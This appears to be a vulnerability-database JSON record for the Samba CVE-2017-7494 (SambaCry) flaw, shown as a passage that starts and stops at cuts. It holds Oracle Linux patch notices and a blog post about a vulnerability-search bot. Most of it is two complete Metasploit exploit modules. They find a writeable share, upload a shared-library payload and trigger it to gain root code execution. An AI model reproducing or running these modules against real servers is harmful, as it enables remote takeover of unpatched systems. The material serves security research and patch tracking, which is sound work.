\nsystem(\"$stringbind\"); #triggering exploit \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142782/NAsamba.pl.txt"}, {"lastseen": "2017-05-27T17:54:19", "description": "", "published": "2017-05-27T00:00:00", "type": "packetstorm", "title": "Samba is_known_pipename() Arbitrary Module Load", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-27T00:00:00", "id": "PACKETSTORM:142715", "href": "https://packetstormsecurity.com/files/142715/Samba-is_known_pipename-Arbitrary-Module-Load.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba is_known_pipename() Arbitrary Module Load', \n'Description' => %q{ \nThis module triggers an arbitrary shared library load vulnerability \nin Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module \nrequires valid credentials, a writeable folder in an accessible share, \nand knowledge of the server-side path of the writeable folder. In \nsome cases, anonymous access combined with common filesystem locations \ncan be used to automatically exploit this vulnerability. \n}, \n'Author' => \n[ \n'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery \n'hdm', # Metasploit Module \n'Brendan Coles <bcoles[at]gmail.com>', # Check logic \n'Tavis Ormandy <taviso[at]google.com>', # PID hunting technique \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2017-7494' ], \n[ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ], \n], \n'Payload' => \n{ \n'Space' => 9000, \n'DisableNops' => true \n}, \n'Platform' => 'linux', \n# \n# Targets are currently limited by platforms with ELF-SO payload wrappers \n# \n'Targets' => \n[ \n \n[ 'Linux x86', { 'Arch' => ARCH_X86 } ], \n[ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], \n# \n# Not ready yet \n# [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], \n# [ 'Linux MIPS', { 'Arch' => MIPS } ], \n], \n'Privileged' => true, \n'DisclosureDate' => 'Mar 24 2017', \n'DefaultTarget' => 1)) \n \nregister_options( \n[ \nOptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), \nOptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), \nOptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('BruteforcePID', [false, 'Attempt to use two connections to bruteforce the PID working directory', false]), \n]) \nend \n \n \ndef generate_common_locations \ncandidates = [] \nif datastore['SMB_SHARE_BASE'].to_s.length > 0 \ncandidates << datastore['SMB_SHARE_BASE'] \nend \n \n%W{ /volume1 /volume2 /volume3 /volume4 \n/shared /mnt /mnt/usb /media /mnt/media \n/var/samba /tmp /home /home/shared \n}.each do |base_name| \ncandidates << base_name \ncandidates << [base_name, @share] \ncandidates << [base_name, @share.downcase] \ncandidates << [base_name, @share.upcase] \ncandidates << [base_name, @share.capitalize] \ncandidates << [base_name, @share.gsub(\" \", \"_\")] \nend \n \ncandidates.uniq \nend \n \ndef enumerate_directories(share) \nbegin \nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nstuff = self.simple.client.find_first(\"\\\\*\") \ndirectories = [\"\"] \nstuff.each_pair do |entry,entry_attr| \nnext if %W{. ..}.include?(entry) \nnext unless entry_attr['type'] == 'D' \ndirectories << entry \nend \n \nreturn directories \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Enum #{share}: #{e}\") \nreturn nil \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nend \nend \nend \n \ndef verify_writeable_directory(share, directory=\"\") \nbegin \nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\") \n \nrandom_filename = Rex::Text.rand_text_alpha(5)+\".txt\" \nfilename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\" \n \nwfd = simple.open(filename, 'rwct') \nwfd << Rex::Text.rand_text_alpha(8) \nwfd.close \n \nsimple.delete(filename) \nreturn true \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Write #{share}#{filename}: #{e}\") \nreturn false \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\") \nend \nend \nend \n \ndef share_type(val) \n[ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val] \nend \n \ndef enumerate_shares_lanman \nshares = [] \nbegin \nres = self.simple.client.trans( \n\"\\\\PIPE\\\\LANMAN\", \n( \n[0x00].pack('v') + \n\"WrLeh\\x00\" + \n\"B13BWz\\x00\" + \n[0x01, 65406].pack(\"vv\") \n)) \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Could not enumerate shares via LANMAN\") \nreturn [] \nend \nif res.nil? \nvprint_error(\"Could not enumerate shares via LANMAN\") \nreturn [] \nend \n \nlerror, lconv, lentries, lcount = res['Payload'].to_s[ \nres['Payload'].v['ParamOffset'], \nres['Payload'].v['ParamCount'] \n].unpack(\"v4\") \n \ndata = res['Payload'].to_s[ \nres['Payload'].v['DataOffset'], \nres['Payload'].v['DataCount'] \n] \n \n0.upto(lentries - 1) do |i| \nsname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\") \nstype = data[(i * 20) + 14, 2].unpack('v')[0] \nscoff = data[(i * 20) + 16, 2].unpack('v')[0] \nscoff -= lconv if lconv != 0 \nscomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\") \nshares << [ sname, share_type(stype), scomm] \nend \n \nshares \nend \n \ndef probe_module_path(path, simple_client=self.simple) \nbegin \nsimple_client.create_pipe(path) \nrescue Rex::Proto::SMB::Exceptions::ErrorCode => e \nvprint_error(\"Probe: #{path}: #{e}\") \nend \nend \n \ndef find_writeable_path(share) \nsubdirs = enumerate_directories(share) \nreturn unless subdirs \n \nif datastore['SMB_FOLDER'].to_s.length > 0 \nsubdirs.unshift(datastore['SMB_FOLDER']) \nend \n \nsubdirs.each do |subdir| \nnext unless verify_writeable_directory(share, subdir) \nreturn subdir \nend \n \nnil \nend \n \ndef find_writeable_share_path \n@path = nil \nshare_info = enumerate_shares_lanman \nif datastore['SMB_SHARE_NAME'].to_s.length > 0 \nshare_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', ''] \nend \n \nshare_info.each do |share| \nnext if share.first.upcase == 'IPC$' \nfound = find_writeable_path(share.first) \nnext unless found \n@share = share.first \n@path = found \nbreak \nend \nend \n \ndef find_writeable \nfind_writeable_share_path \nunless @share && @path \nprint_error(\"No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\") \nfail_with(Failure::NoTarget, \"No matching target\") \nend \nprint_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\") \nend \n \ndef upload_payload \nbegin \nself.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \n \nrandom_filename = Rex::Text.rand_text_alpha(8)+\".so\" \nfilename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\" \nwfd = simple.open(filename, 'rwct') \nwfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, \npayload.encoded, \"elf-so\", {:arch => target.arch, :platform => target.platform} \n) \nwfd.close \n \n@payload_name = random_filename \nreturn true \n \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nprint_error(\"Write #{@share}#{filename}: #{e}\") \nreturn false \n \nensure \nif self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{@share}\"] \nself.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nend \nend \nend \n \ndef find_payload \n \n# Reconnect to IPC$ \nsimple.connect(\"\\\\\\\\#{rhost}\\\\IPC$\") \n \n# Look for common paths first, since they can be a lot quicker than hunting PIDs \nprint_status(\"Hunting for payload using common path names: #{@payload_name} - //#{rhost}/#{@share}/#{@path}\") \ngenerate_common_locations.each do |location| \ntarget = [location, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/') \nprint_status(\"Trying location #{target}...\") \nprobe_module_path(target) \nend \n \n# Exit early if we already have a session \nreturn if session_created? \n \nreturn unless datastore['BruteforcePID'] \n \n# XXX: This technique doesn't seem to work in practice, as both processes have setuid()d \n# to non-root, but their /proc/pid directories are still owned by root. Trying to \n# read the /proc/other-pid/cwd/target.so results in permission denied. There is a \n# good chance that this still works on some embedded systems and odd-ball Linux. \n \n# Use the PID hunting strategy devised by Tavis Ormandy \nprint_status(\"Hunting for payload using PID search: #{@payload_name} - //#{rhost}/#{@share}/#{@path} (UNLIKELY TO WORK!)\") \n \n# Configure the main connection to have a working directory of the file share \nsimple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \n \n# Use a second connection to brute force the PID of the first connection \nprobe_conn = connect(false) \nsmb_login(probe_conn) \nprobe_conn.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nprobe_conn.connect(\"\\\\\\\\#{rhost}\\\\IPC$\") \n \n# Run from 2 to MAX_PID (ushort) trying to read the other process CWD \n2.upto(32768) do |pid| \n \n# Look for the PID associated with our main SMB connection \ntarget = [\"/proc/#{pid}/cwd\", @path, @payload_name].join(\"/\").gsub(/\\/+/, '/') \nvprint_status(\"Trying PID with target path #{target}...\") \nprobe_module_path(target, probe_conn) \n \n# Keep our main connection alive \nif pid % 1000 == 0 \nself.simple.client.find_first(\"\\\\*\") \nend \nend \n \nend \n \ndef check \nres = smb_fingerprint \n \nunless res['native_lm'] =~ /Samba ([\\d\\.]+)/ \nprint_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\") \nreturn CheckCode::Safe \nend \n \nsamba_version = Gem::Version.new($1.gsub(/\\.$/, '')) \n \nvprint_status(\"Samba version identified as #{samba_version.to_s}\") \n \nif samba_version < Gem::Version.new('3.5.0') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.4.14 \nif samba_version < Gem::Version.new('4.5.0') && \nsamba_version >= Gem::Version.new('4.4.14') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.5.10 \nif samba_version > Gem::Version.new('4.5.0') && \nsamba_version < Gem::Version.new('4.6.0') && \nsamba_version >= Gem::Version.new('4.5.10') \nreturn CheckCode::Safe \nend \n \n# Patched in 4.6.4 \nif samba_version >= Gem::Version.new('4.6.4') \nreturn CheckCode::Safe \nend \n \nconnect \nsmb_login \nfind_writeable_share_path \ndisconnect \n \nif @share.to_s.length == 0 \nprint_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\") \nreturn CheckCode::Detected \nend \n \nprint_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\") \nreturn CheckCode::Appears \nend \n \ndef exploit \n# Setup SMB \nconnect \nsmb_login \n \n# Find a writeable share \nfind_writeable \n \n# Upload the shared library payload \nupload_payload \n \n# Find and execute the payload from the share \nbegin \nfind_payload \nrescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply \nend \n \n# Cleanup the payload \nbegin \nsimple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nuploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\" \nsimple.delete(uploaded_path) \nrescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply \nend \n \n# Shutdown \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142715/is_known_pipename.rb.txt"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[3.6.23-13.0.2]\n- Fix CVE-2017-7494", "edition": 4, "modified": "2017-05-26T00:00:00", "published": "2017-05-26T00:00:00", "id": "ELSA-2017-1272", "href": "http://linux.oracle.com/errata/ELSA-2017-1272.html", "title": "samba3x security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[3.6.23-43.0.1]\n- Remove use-after-free talloc_tos() inlined function problem (John Haxby) [orabug 18253258]\n[3.6.24-43]\n- resolves: #1450782 - Fix CVE-2017-7494", "edition": 4, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "ELSA-2017-1270", "href": "http://linux.oracle.com/errata/ELSA-2017-1270.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[4.2.10-10]\n- resolves: #1450779 - Security fix for CVE-2017-7494", "edition": 4, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "ELSA-2017-1271", "href": "http://linux.oracle.com/errata/ELSA-2017-1271.html", "title": "samba4 security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2017-06-10T11:14:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "[Vulners.com](<http://Vulners.com>) team have recently presented a new version of [vulnerability intelligence bot](<https://telegram.me/vulnersBot>) for Telegram messenger. Now you can search for vulnerabilities and other security content by talking with bot.\n\n### Searches\n\nFor example, I've heard about new critical vulnerability in Samba called SambaCry by analogy with [famous WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>). Let's see what Vulners knows about it.\n\n\n\nOk, I see it has id CVE-2017-7494. Do we have exploits related to this vulnerability? \n_ cvelist:CVE-2017-7494 AND bulletinFamily:\"exploit\"_\n\n\n\nEven in Metasploit! Seems to be critical. Do we already have patches for CentOS 6 and 7? \n_cvelist:CVE-2017-7494 AND type:centos_\n\n\n\nYep, we can now make a task to IT department to update it.\n\n**NB:** Did you know that critical patches for CentOS 5 were available till the March 31 2017? CentOS 5 is officially dead and if you still use it you should migrate to supported distribution ASAP.\n\nCan we already detect this vulnerability using vulnerability scanners? \n_cvelist:CVE-2017-7494 AND bulletinFamily:\"scanner\" AND title:CentOS_\n\n\n\nTwo authenticated checks for Nessus. Not bad. If you have configured regular vulnerability scans of your infrastructure, you can get the list of vulnerable hosts from the existing scan results. Or you can perform a new scan task with only this two active plugins in the scan policy.\n\n### Subscriptions\n\nHowever, this vulnerability is interesting and I would like to get new information about it as soon as it will be available in Vulners. I want to subscribe to _cvelist:CVE-2017-7494 OR SambaCry_. Checking the request:\n\n\n\nAnd making a new subscription. Available commands:\n\n\n\nI choose _/subscription_\n\n\n\n\"Add new subscription\":\n\n\n\n\"Custom query\":\n\n\n\nSubscription delivery format. I choose \"Text\":\n\n\n\nHow often I would like to receive messages. \"As soon as possible\":\n\n\n\nApprove the subscription:\n\n\n\n\n\nWhen Vulners will get a new object matched by this query, vulnersBot will send me a notification like this one:\n\n\n\nAnd if I would like to delete this subscription, I will write /subscription and choose \"Edit current subscription\". Bot will show me my current subscriptions:\n\n\n\nEach of them I can Activate, Deactivate or Delete:\n\n\n\nAs you can see, I have also a subscription \"Blogs review\". It's one of the standard templates that you can choose in vulnersBot. It is the same as _bulletinFamily:blog_\n\nVulners aggregates posts from 13 \"blog\" sources right now. This list includes top Vulnerability Management vendors Qualys and Rapid7, and WAF vendors Akamai, Imperva, Wallarm, well-known media and independent security bloggers. So if some really critical vulnerability will appear, I will easily get actual information from them.\n\n\n\nThis templates are currently available in \"subscription marketplace\" :\n\n * Security news\n * Exploit updates\n * Blogs review\n * Bugbounty\n * Linux vulnerabilities\n * Scanners plugins updates\n * CVE\n\nThanks for your attention! If you find a bug in vulnersBot please write an email to isox@vulners.com or telegram user @isox_xx\n\n", "modified": "2017-05-28T10:59:52", "published": "2017-05-28T10:59:52", "href": "http://feedproxy.google.com/~r/avleonov/~3/g4smUW8Mxok/", "id": "AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627", "title": "New vulnersBot for Telegram with advanced searches and subscriptions", "type": "avleonov", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-07T20:08:57", "description": "This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.\n", "published": "2017-05-25T00:42:04", "type": "metasploit", "title": "Samba is_known_pipename() Arbitrary Module Load", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\n 'Description' => %q{\n This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.\n },\n 'Author' =>\n [\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit\n 'hdm', # Metasploit Module\n 'bcoles', # Check logic\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7494' ],\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\n ],\n 'Payload' =>\n {\n 'Space' => 9000,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n\n [ 'Automatic (Interact)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'\n }\n }\n }\n ],\n [ 'Automatic (Command)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }\n ],\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\n [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],\n [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],\n [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],\n [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],\n [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],\n [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],\n [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],\n [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],\n [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],\n [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],\n [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],\n ],\n 'DefaultOptions' =>\n {\n 'DCERPC::fake_bind_multi' => false,\n 'SHELL' => '/bin/sh',\n },\n 'Privileged' => true,\n 'DisclosureDate' => '2017-03-24',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\n ])\n\n end\n\n def post_auth?\n true\n end\n\n # Setup our mapping of Metasploit architectures to gcc architectures\n def setup\n super\n @@payload_arch_mappings = {\n ARCH_X86 => [ 'x86' ],\n ARCH_X64 => [ 'x86_64' ],\n ARCH_MIPS => [ 'mips' ],\n ARCH_MIPSLE => [ 'mipsel' ],\n ARCH_MIPSBE => [ 'mips' ],\n ARCH_MIPS64 => [ 'mips64' ],\n ARCH_MIPS64LE => [ 'mips64el' ],\n ARCH_PPC => [ 'powerpc' ],\n ARCH_PPC64 => [ 'powerpc64' ],\n ARCH_PPC64LE => [ 'powerpc64le' ],\n ARCH_SPARC => [ 'sparc' ],\n ARCH_SPARC64 => [ 'sparc64' ],\n ARCH_ARMLE => [ 'armel', 'armhf' ],\n ARCH_AARCH64 => [ 'aarch64' ],\n ARCH_ZARCH => [ 's390x' ],\n }\n\n # Architectures we don't offically support but can shell anyways with interact\n @@payload_arch_bonus = %W{\n mips64el sparc64 s390x\n }\n\n # General platforms (OS + C library)\n @@payload_platforms = %W{\n linux-glibc\n }\n end\n\n # List all top-level directories within a given share\n def enumerate_directories(share)\n begin\n vprint_status('Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n stuff = self.simple.client.find_first(\"\\\\*\")\n directories = [\"\"]\n stuff.each_pair do |entry,entry_attr|\n next if %W{. ..}.include?(entry)\n next unless entry_attr['type'] == 'D'\n directories << entry\n end\n\n return directories\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Enum #{share}: #{e}\")\n return nil\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n smb_connect\n end\n end\n\n # Determine whether a directory in a share is writeable\n def verify_writeable_directory(share, directory=\"\")\n begin\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\n filename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << Rex::Text.rand_text_alpha(8)\n wfd.close\n\n simple.delete(filename)\n return true\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e\n vprint_error(\"Write #{share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Call NetShareGetInfo to retrieve the server-side path\n def find_share_path\n share_info = smb_netsharegetinfo(@share)\n share_info[:path].gsub(\"\\\\\", \"/\").sub(/^.*:/, '')\n end\n\n # Crawl top-level directories and test for writeable\n def find_writeable_path(share)\n subdirs = enumerate_directories(share)\n return unless subdirs\n\n if datastore['SMB_FOLDER'].to_s.length > 0\n subdirs.unshift(datastore['SMB_FOLDER'])\n end\n\n subdirs.each do |subdir|\n next unless verify_writeable_directory(share, subdir)\n return subdir\n end\n\n nil\n end\n\n # Locate a writeable directory across identified shares\n def find_writeable_share_path\n @path = nil\n share_info = smb_netshareenumall\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\n end\n\n share_info.each do |share|\n next if share.first.upcase == 'IPC$'\n found = find_writeable_path(share.first)\n next unless found\n @share = share.first\n @path = found\n break\n end\n end\n\n # Locate a writeable share\n def find_writeable\n find_writeable_share_path\n unless @share && @path\n print_error(\"No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\n end\n\n # Store the wrapped payload into the writeable share\n def upload_payload(wrapped_payload)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\n filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << wrapped_payload\n wfd.close\n\n @payload_name = random_filename\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n print_error(\"Write #{@share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n end\n\n print_status(\"Uploaded payload to \\\\\\\\#{rhost}\\\\#{@share}#{filename}\")\n return true\n end\n\n # Try both pipe open formats in order to load the uploaded shared library\n def trigger_payload\n\n target = [@share_path, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\n [\n \"\\\\\\\\PIPE\\\\\" + target,\n target\n ].each do |tpath|\n\n print_status(\"Loading the payload from server-side path #{target} using #{tpath}...\")\n\n smb_connect\n\n # Try to execute the shared library from the share\n begin\n simple.client.create_pipe(tpath)\n probe_module_path(tpath)\n\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n # Common errors we can safely ignore\n\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded\n if e.error_code == 0xc0000039\n pwn\n return true\n else\n print_error(\" >> Failed to load #{e.error_name}\")\n end\n rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e\n if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID\n pwn\n return true\n else\n print_error(\" >> Failed to load #{e.status_code.name}\")\n end\n end\n\n disconnect\n\n end\n\n false\n end\n\n def pwn\n print_good(\"Probe response indicates the interactive payload was loaded...\")\n smb_shell = self.sock\n self.sock = nil\n remove_socket(sock)\n handler(smb_shell)\n end\n\n # Use fancy payload wrappers to make exploitation a joyously lazy exercise\n def cycle_possible_payloads\n template_base = ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2017-7494\")\n template_list = []\n template_type = nil\n template_arch = nil\n\n # Handle the generic command types first\n if target.arch.include?(ARCH_CMD)\n template_type = target['Interact'] ? 'findsock' : 'system'\n\n all_architectures = @@payload_arch_mappings.values.flatten.uniq\n\n # Include our bonus architectures for the interact payload\n if target['Interact']\n @@payload_arch_bonus.each do |t_arch|\n all_architectures << t_arch\n end\n end\n\n # Prioritize the most common architectures first\n %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|\n template_list << all_architectures.delete(t_arch)\n end\n\n # Queue up the rest for later\n all_architectures.each do |t_arch|\n template_list << t_arch\n end\n\n # Handle the specific architecture targets next\n else\n template_type = 'shellcode'\n target.arch.each do |t_name|\n @@payload_arch_mappings[t_name].each do |t_arch|\n template_list << t_arch\n end\n end\n end\n\n # Remove any duplicates that mau have snuck in\n template_list.uniq!\n\n # Cycle through each top-level platform we know about\n @@payload_platforms.each do |t_plat|\n\n # Cycle through each template and yield\n template_list.each do |t_arch|\n\n\n wrapper_path = ::File.join(template_base, \"samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz\")\n next unless ::File.exists?(wrapper_path)\n\n data = ''\n ::File.open(wrapper_path, \"rb\") do |fd|\n data = Rex::Text.ungzip(fd.read)\n end\n\n pidx = data.index('PAYLOAD')\n if pidx\n data[pidx, payload.encoded.length] = payload.encoded\n end\n\n vprint_status(\"Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...\")\n yield(data)\n end\n end\n end\n\n # Verify that the payload settings make sense\n def sanity_check\n if target['Interact'] && datastore['PAYLOAD'] != \"cmd/unix/interact\"\n print_error(\"Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact\")\n print_error(\" Please set PAYLOAD to cmd/unix/interact and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the interactive target\")\n end\n\n if ! target['Interact'] && datastore['PAYLOAD'] == \"cmd/unix/interact\"\n print_error(\"Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact\")\n print_error(\" Please set a valid PAYLOAD and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the non-interactive target\")\n end\n end\n\n # Shorthand for connect and login\n def smb_connect\n connect\n smb_login\n end\n\n # Start the shell train\n def exploit\n # Validate settings\n sanity_check\n\n # Setup SMB\n smb_connect\n\n # Find a writeable share\n find_writeable\n\n # Retrieve the server-side path of the share like a boss\n print_status(\"Retrieving the remote path of the share '#{@share}'\")\n @share_path = find_share_path\n print_status(\"Share '#{@share}' has server-side path '#{@share_path}\")\n\n # Disconnect\n disconnect\n\n # Create wrappers for each potential architecture\n cycle_possible_payloads do |wrapped_payload|\n\n # Connect, upload the shared library payload, disconnect\n smb_connect\n upload_payload(wrapped_payload)\n disconnect\n\n # Trigger the payload\n early = trigger_payload\n\n # Cleanup the payload\n begin\n smb_connect\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n uploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\n simple.delete(uploaded_path)\n disconnect\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n end\n\n # Bail early if our interact payload loaded\n return if early\n end\n end\n\n # A version-based vulnerability check for Samba\n 